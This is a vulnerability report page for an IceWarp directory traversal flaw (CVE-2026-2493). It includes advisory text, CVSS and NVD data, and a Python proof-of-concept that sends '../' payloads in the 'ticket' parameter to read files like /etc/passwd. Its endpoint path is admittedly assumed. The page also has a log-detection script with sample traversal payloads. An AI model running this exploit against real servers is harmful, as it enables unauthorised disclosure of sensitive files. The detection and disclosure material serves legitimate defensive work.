Security Vulnerability Report
CVE-2026-2493 CVSS 7.5 HIGH

Published: 2026-03-16 14:19:31
Last Modified: 2026-03-16 14:53:07

Description

IceWarp collaboration Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of IceWarp. Authentication is not required to exploit this vulnerability. The specific flaw exists within handling of the ticket parameter provided to the collaboration endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-25440.

Weakness: CWE-22 (improper limitation of a pathname to a restricted directory), per the NVD record below.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available (the NVD record is still "Awaiting Analysis", so no CPE ranges have been published).

IceWarp collaboration < latest fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2026-2493 IceWarp Directory Traversal PoC
# Target: IceWarp collaboration endpoint
# Vulnerability: Directory traversal via ticket parameter
#
# Caveat: the advisory only names "the collaboration endpoint" and its
# "ticket" parameter. The /api/collaboration path and the traversal depth
# used below are assumptions of this PoC, not details from the advisory,
# and need to be adjusted for the target deployment.


def exploit(target_url, file_path):
    """
    Exploit directory traversal to read arbitrary files

    Args:
        target_url: Base URL of IceWarp server
        file_path: Path to file to read (e.g., /etc/passwd)
    """
    # Normalize the file path for traversal
    traversal = '../' * 6  # Navigate up 6 directories
    encoded_file = file_path.lstrip('/')

    # Construct the malicious ticket parameter
    payload = traversal + encoded_file

    # Target endpoint
    endpoint = f"{target_url}/api/collaboration"
    params = {'ticket': payload}

    print(f"[*] Target: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Payload: {payload}")

    try:
        response = requests.get(endpoint, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Success! File contents:")
            print(response.text[:500])  # Print first 500 chars
            return response.text
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: {sys.argv[0]} https://vulnerable-server.com /etc/passwd")
        sys.exit(1)
    target = sys.argv[1]
    file_to_read = sys.argv[2]
    exploit(target, file_to_read)
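On the defensive side, the same traversal pattern the PoC sends is easy to hunt for in web-server access logs, provided the detection decodes the parameter the way the server would. The following is an added example, not IceWarp's code and not part of this report: it parses constructed combined-format access-log lines (the `/collaboration/` path and the log format are assumptions), pulls the `ticket` query parameter, percent-decodes it repeatedly so double-encoded `..%252f` variants are caught, and flags traversal segments. A 200 with a non-empty body on such a request is the event worth paging on.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Added example (not IceWarp's code): spot traversal attempts against a
# "ticket" query parameter in web-server access logs. The log lines below are
# constructed for illustration; the /collaboration/ path is an assumption,
# since the advisory names only "the collaboration endpoint".
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2026:14:20:01 +0000] "GET /collaboration/?ticket=abc123 HTTP/1.1" 200 512
203.0.113.7 - - [16/Mar/2026:14:20:05 +0000] "GET /collaboration/?ticket=../../../../etc/passwd HTTP/1.1" 200 2048
203.0.113.7 - - [16/Mar/2026:14:20:09 +0000] "GET /collaboration/?ticket=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1337
203.0.113.7 - - [16/Mar/2026:14:20:12 +0000] "GET /collaboration/?ticket=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
198.51.100.2 - - [16/Mar/2026:14:21:00 +0000] "GET /webmail/ HTTP/1.1" 200 9000
"""

# Combined/common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# A '..' path segment, with either slash flavour, at the start or after a separator.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded sequences like %252e%252e%252f become '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal_attempts(log_text: str, param: str = "ticket") -> list:
    """Return one record per request whose decoded `param` contains a '..' segment."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs already decodes once; decode_fully handles further layers.
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            decoded = decode_fully(raw)
            if TRAVERSAL_RE.search(decoded):
                hits.append({
                    "ip": m["ip"],
                    "timestamp": m["ts"],
                    "status": int(m["status"]),
                    "size": 0 if m["size"] == "-" else int(m["size"]),
                    "ticket": decoded,
                    "raw": raw,
                })
    return hits


def likely_successful(hits: list) -> list:
    """A 200 with a non-empty body on a traversal request suggests the file was served."""
    return [h for h in hits if h["status"] == 200 and h["size"] > 0]


if __name__ == "__main__":
    for h in find_traversal_attempts(SAMPLE_LOG):
        print(f"{h['ip']} {h['status']} {h['size']:>6} {h['ticket']}")
    print(f"likely successful: {len(likely_successful(find_traversal_attempts(SAMPLE_LOG)))}")
```

The decode loop is bounded on purpose: an attacker can nest encodings indefinitely, and an unbounded loop on untrusted input is its own problem. Three rounds cover the single- and double-encoded forms that actually show up in scanner traffic.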

References

https://www.zerodayinitiative.com/advisories/ZDI-26-130/ (ZDI-26-130, formerly ZDI-CAN-25440)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2493",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:19:30.700",
    "lastModified": "2026-03-16T14:53:07.390",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IceWarp collaboration Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of IceWarp. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within handling of the ticket parameter provided to the collaboration endpoint. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of root. Was ZDI-CAN-25440."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad de revelación de información por salto de directorio en la colaboración de IceWarp. Esta vulnerabilidad permite a atacantes remotos revelar información sensible en instalaciones afectadas de IceWarp. La autenticación no es necesaria para explotar esta vulnerabilidad. La falla específica existe en el manejo del parámetro ticket proporcionado al endpoint de colaboración. El problema resulta de la falta de validación adecuada de una ruta proporcionada por el usuario antes de usarla en operaciones de archivo. Un atacante puede aprovechar esta vulnerabilidad para revelar información en el contexto de root. Fue ZDI-CAN-25440."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-130/",
        "source": "[email protected]"
      }
    ]
  }
}